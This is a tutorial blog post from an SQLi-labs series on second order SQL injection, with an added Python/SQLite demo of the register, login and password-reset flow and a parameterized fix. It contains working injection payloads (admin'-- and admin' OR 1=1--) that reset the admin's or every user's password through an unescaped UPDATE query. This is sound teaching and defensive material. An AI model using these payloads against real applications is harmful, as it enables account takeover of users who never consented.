Tuesday, December 4, 2012

SQLI-LABS SERIES PART-17

SECOND ORDER INJECTIONS

Second order injections are not widely discussed. They are hard for automated scanners to find, because the point where the payload enters and the point where it does damage are separated in time and place; one needs to understand the application logic and data flow to detect them, and a code review is the best way to do so.
In general, injections happen when the developer trusts user input, or fails to sanitize it, and uses it to build the query the application runs.

What are second order injections?
Second order injections can be considered similar to stored XSS. The injection does not directly yield a result; the injected string is stored and later used insecurely somewhere else in the application, and that is where it triggers and yields results.
As an example, imagine an application that lets users create accounts. A malicious user tries to inject SQL keywords through the registration form, but that form escapes dangerous characters with mysql_real_escape_string(), which makes the form itself safe. If the attacker enters admin'-- in the username field (with a trailing space, since MySQL's -- comment needs one; admin'# would work too), the quote is escaped and the value reaching the INSERT is admin\'-- , so the INSERT runs exactly as intended. If the other form values are valid, an account is created whose stored username is, literally, admin'-- . The escaping protected the query, not the stored value: the backslash is an escape for the SQL parser and never reaches the table.




Now, logged in with the newly created account, the attacker goes to the password reset page. This page checks the old password and builds a query behind the scenes along the lines of
UPDATE users SET passwd='New_Pass' WHERE username='Username' AND passwd='oldpassword'

The username here does not come from the form; it is read back from the database (via the session populated at login), so the developer treats it as trusted. Confident that the registration page already blocked injection, he concatenates the stored value into the query without any escaping, and the stored username triggers the SQL injection.

The query becomes
UPDATE users SET passwd='New_Pass' WHERE username='admin'-- ' AND passwd='oldpassword'
Everything after -- is a comment, so the old-password check is discarded and the statement sets the password of the admin user, whose account the attacker never logged in to. The lesson is that data does not become safe by having been stored: every value must be treated as untrusted at the query that uses it, whether it comes from a form, a cookie, a session or the database itself.
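The full flow above (register through an escaped form, log in, then reset the password with a query that trusts the stored username), as an added example that is not part of the original post or of sqli-labs. It is written in Python against an in-memory SQLite database as a stand-in for the lab's PHP/MySQL code: sql_escape() plays the role of mysql_real_escape_string() using SQLite's '' quoting, the users table and its two seed accounts are constructed, and all function names are this example's own. second_order_attack() runs the sequence with a chosen registered name and returns whose password actually changed; it tries the admin'-- payload, the admin' OR 1=1-- variant (whose WHERE clause matches every row, so every password changes), and a parameterized reset_password_fixed() that closes the hole.

```python
import sqlite3

# Constructed sample data standing in for the lab's users table.
SEED_USERS = [("admin", "admin_secret"), ("Dumb", "Dumb")]


def setup_db():
    """Fresh in-memory database holding the constructed seed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, passwd TEXT NOT NULL)")
    conn.executemany("INSERT INTO users (username, passwd) VALUES (?, ?)", SEED_USERS)
    conn.commit()
    return conn


def sql_escape(value):
    """Stand-in for mysql_real_escape_string(): SQLite writes a literal ' as ''.
    (MySQL backslash-escapes instead; the effect on the query is the same.)"""
    return value.replace("'", "''")


def register(conn, username, password):
    """Registration form: parameterized, so the quote in the username is harmless
    here and the payload is stored verbatim, exactly as the user typed it."""
    conn.execute("INSERT INTO users (username, passwd) VALUES (?, ?)", (username, password))
    conn.commit()


def login(conn, username, password):
    """Login form: also parameterized. Returns the username read back from the
    database, which the application will later treat as trusted session data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND passwd = ?", (username, password)
    ).fetchone()
    return row[0] if row else None


def build_reset_query(session_username, old_password, new_password):
    """The vulnerable password-reset query: both form fields are escaped, but the
    username taken from the session (originally from the database) is spliced in raw."""
    return "UPDATE users SET passwd='%s' WHERE username='%s' AND passwd='%s'" % (
        sql_escape(new_password),
        session_username,
        sql_escape(old_password),
    )


def reset_password_vulnerable(conn, session_username, old_password, new_password):
    """Executes the concatenated query; returns how many rows were updated."""
    cur = conn.execute(build_reset_query(session_username, old_password, new_password))
    conn.commit()
    return cur.rowcount


def reset_password_fixed(conn, session_username, old_password, new_password):
    """Hardened version: every value, including the 'trusted' one from the
    database, goes through a placeholder, so stored data can never become SQL."""
    cur = conn.execute(
        "UPDATE users SET passwd = ? WHERE username = ? AND passwd = ?",
        (new_password, session_username, old_password),
    )
    conn.commit()
    return cur.rowcount


def second_order_attack(registered_name, new_password, reset_fn):
    """Run register -> login -> reset against a fresh database and return the
    sorted usernames whose password is now new_password."""
    conn = setup_db()
    register(conn, registered_name, "attacker_pw")                 # first order: safe
    session_user = login(conn, registered_name, "attacker_pw")     # first order: safe
    reset_fn(conn, session_user, "attacker_pw", new_password)      # second order: the trigger
    rows = conn.execute("SELECT username FROM users WHERE passwd = ?", (new_password,)).fetchall()
    return sorted(r[0] for r in rows)


if __name__ == "__main__":
    # MySQL's -- comment needs a trailing space, hence the space after the dashes.
    print(build_reset_query("admin'-- ", "attacker_pw", "pwned"))
    print(second_order_attack("admin'-- ", "pwned", reset_password_vulnerable))         # ['admin']
    print(second_order_attack("admin' OR 1=1-- ", "pwned", reset_password_vulnerable))  # every user
    print(second_order_attack("admin'-- ", "pwned", reset_password_fixed))              # attacker only
```

The trailing space after -- is kept so the same payload works against MySQL, where it is mandatory; SQLite would accept the comment without it. Note that the fix is not to escape data on its way out of the database but to bind every value, whatever its origin, as a parameter: reset_password_fixed() changes only the row of the account that actually logged in.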


A video demonstration of the same can be found at the location below.

